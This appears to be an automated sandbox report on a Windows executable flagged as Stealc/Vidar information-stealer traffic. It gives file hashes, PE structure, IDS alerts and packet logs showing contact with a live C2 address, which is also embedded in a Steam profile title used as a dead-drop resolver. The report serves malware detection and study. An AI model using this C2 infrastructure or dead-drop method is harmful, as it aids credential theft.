                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: g0b4c https://95.217.220.103|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steam

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          File Type:RDI Acoustic Doppler Current Profiler (ADCP)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1048575
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:L8aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaU:LU
                                                                                                                                                                                                                          MD5:451252DF36D199577E9C9CE4ABF19CD3
                                                                                                                                                                                                                          SHA1:2887A551208C286314D55C5C1F401BA8057F1A0E
                                                                                                                                                                                                                          SHA-256:2AB0F11CFEEED22056ED06F6506E7A32C7024711B0B98BFED9BAAE9A988408A8
                                                                                                                                                                                                                          SHA-512:894DDD1EC46B8377B876BCB421D791BB99793A8EAF628774E804607FEA34D9FC2E9974D224A0EC949073FA7C78F333C7924FC92E4C417DBC002584950FC4AF43
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                          Entropy (8bit):4.465464467818732
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:2IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb0:7XD94+WlLZMM6YFHR+0
                                                                                                                                                                                                                          MD5:4C1EE5A1A840740F3966767238BE4A4D
                                                                                                                                                                                                                          SHA1:A4564220E6E70527D9C47F0FBB0E46F84DFE65E9
                                                                                                                                                                                                                          SHA-256:DB4F4631ABDA091F6F6611E1D975A31D3110EC6C339B7B5539B00E4F5FBBD6E2
                                                                                                                                                                                                                          SHA-512:37017F655F8EF1E266FE15505145508D07D6C1E467EB44B68BF6FD7D3B7994B88DE1690AEA3702EEB2376E001521E18B38F957C9970636DE67FA7DD6565ABBC7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmn...\%...............................................................................................................................................................................................................................................................................................................................................l..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.643471572502925
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                          File name:UMrFwHyjUi.exe
                                                                                                                                                                                                                          File size:631'936 bytes
                                                                                                                                                                                                                          MD5:0d90ef55d1b1cb43ccb8fd30bbeba1a4
                                                                                                                                                                                                                          SHA1:5230fea74e8c4dedda59cbcdd13a9bc7ad035ac0
                                                                                                                                                                                                                          SHA256:13cf27504612ba911a324205db08dfa22cc42f3cb7e2600a69b65091ac528940
                                                                                                                                                                                                                          SHA512:9ced2030fee2ffa87246949d64d01493d4afd90082d7a6a376e2ffb454cd4553c30deff65b5dcf84e803f6019b5efd711e0dfd6738de12da037b009209ad854d
                                                                                                                                                                                                                          SSDEEP:12288:NFgKK6/E6QB44hLSVGuZwpZhOre3fpkugJtCJcplr7v:NFgS/EVe4hL0GuZwpZ6e3CXmGr7v
                                                                                                                                                                                                                          TLSH:5DD4F12135C0C072D6A3293609E4EBB56E7EF9300EA55E9F73980B7E4F703819735A5A
                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........L..v...v...v...u...v...s.a.v...r...v...w...v...w.M.v...r...v...u...v...s...v.......v.......v...t...v.Rich..v................

                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Entrypoint:0x409922
                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                          Time Stamp:0x6716601E [Mon Oct 21 14:07:26 2024 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:31770ac6e89309fe8c99522fb04f055c

                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                          • 31/08/2023 01:00:00 31/08/2026 00:59:59
                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                          • CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                          Thumbprint MD5:AD1BCBF19AE2F91BB114D33B85359E56
                                                                                                                                                                                                                          Thumbprint SHA-1:141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
                                                                                                                                                                                                                          Thumbprint SHA-256:A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
                                                                                                                                                                                                                          Serial:00D0461B529F67189D43744E9CEFE172AE

                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          call 00007F1394BF7AD0h
                                                                                                                                                                                                                          jmp 00007F1394BF6F5Fh
                                                                                                                                                                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                          mov esp, ebp
                                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                                                                          xor ecx, ebp
                                                                                                                                                                                                                          call 00007F1394BF6B02h
                                                                                                                                                                                                                          jmp 00007F1394BF70C2h
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                          mov dword ptr [eax], ebp
                                                                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                                                                          mov eax, dword ptr [00432180h]
                                                                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push dword ptr [ebp-04h]
                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                          mov dword ptr [eax], ebp
                                                                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                                                                          mov eax, dword ptr [00432180h]
                                                                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                          push dword ptr [ebp-04h]
                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                          mov dword ptr [eax], ebp
                                                                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                                                                          mov eax, dword ptr [00432180h]
                                                                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          mov dword ptr [ebp-10h], esp
                                                                                                                                                                                                                          push dword ptr [ebp-04h]
                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                          mov dword ptr fs:[00000000h], eax

                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x30bc00x28.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x950000x1e0.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x976000x2e80
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x960000x2100.reloc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x2e0880x1c.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x2e0c00x18.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2dfc80x40.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x260000x158.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                          .text0x10000x247c50x24800d0b4a90124201411609de42d90a2266aFalse0.5836298694349316data6.667699615091458IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rdata0x260000xb3c60xb400391c781551f40065c919167d8be519dbFalse0.4264105902777778data4.902370268867813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .data0x320000x62ec40x62000054079ff07efffb4d844b91676280b23False0.986564791932398data7.991236685552648IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .rsrc0x950000x1e00x2000c003aad746538481e68cecd32d2c290False0.52734375data4.7083919432940915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .reloc0x960000x21000x22007e1c12fab7b5c499d4db33afc7ca1ffbFalse0.7344898897058824data6.455290745494562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .bsp0x990000x30000x3000fa57fe0b9277ec77906afa81ea6dba8aFalse0.019368489583333332OpenPGP Secret Key0.17578433934696627IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                          RT_MANIFEST0x950600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                          KERNEL32.dllGlobalFindAtomA, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WideCharToMultiByte, CloseHandle, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, CreateFileW, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleFileNameW, GetStdHandle, WriteFile, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetStdHandle, HeapSize, WriteConsoleW

                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                          2024-10-23T17:05:26.076725+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974595.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:28.135906+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974795.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:29.688673+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974895.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:31.232344+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974995.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:31.883540+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config195.217.220.103443192.168.2.449749TCP
                                                                                                                                                                                                                          2024-10-23T17:05:32.791542+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975095.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:33.452105+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.44975095.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:33.452370+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1195.217.220.103443192.168.2.449750TCP
                                                                                                                                                                                                                          2024-10-23T17:05:34.407637+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975195.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:35.663703+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975295.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:41.857068+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975395.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:56.315756+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975695.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:05:58.360770+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976295.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:00.539870+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977295.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:02.343684+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44978295.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:06.824500+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44980895.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:11.079987+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44983395.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:14.862988+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44985795.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:18.020599+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44987495.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:20.034709+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44988695.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:27.037332+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44992295.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:28.315052+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44993095.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:29.881096+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44994195.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:31.473792+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44995095.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:33.570468+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44996395.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:36.063596+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44997695.217.220.103443TCP
                                                                                                                                                                                                                          2024-10-23T17:06:37.609359+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44998795.217.220.103443TCP

                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.278274059 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.278328896 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.278410912 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.294296026 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:23.294323921 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.155199051 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.155459881 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.203814030 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.203844070 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.204324961 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.205984116 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.209122896 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.251336098 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775568962 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775608063 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775641918 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775688887 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775713921 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775741100 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.775768042 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776613951 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776670933 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776686907 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776691914 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.776730061 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.777076960 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892288923 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892375946 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892394066 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892419100 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.892544031 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.893547058 CEST49743443192.168.2.492.122.104.90
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.893563032 CEST4434974392.122.104.90192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916415930 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916476965 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916568041 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916949987 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:24.916960955 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.076627970 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.076725006 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.080493927 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.080502987 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.080765009 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.082140923 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.089220047 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:26.131334066 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.248720884 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.248807907 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.248945951 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.251414061 CEST49745443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.251424074 CEST4434974595.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253567934 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253578901 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253675938 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253863096 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:27.253873110 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.135792971 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.135905981 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.136339903 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.136344910 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.138108969 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.138113976 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798448086 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798538923 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798595905 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798618078 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798892021 CEST49747443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.798907042 CEST4434974795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810213089 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810264111 CEST4434974895.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810334921 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810574055 CEST49748443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:05:28.810586929 CEST4434974895.217.220.103192.168.2.4
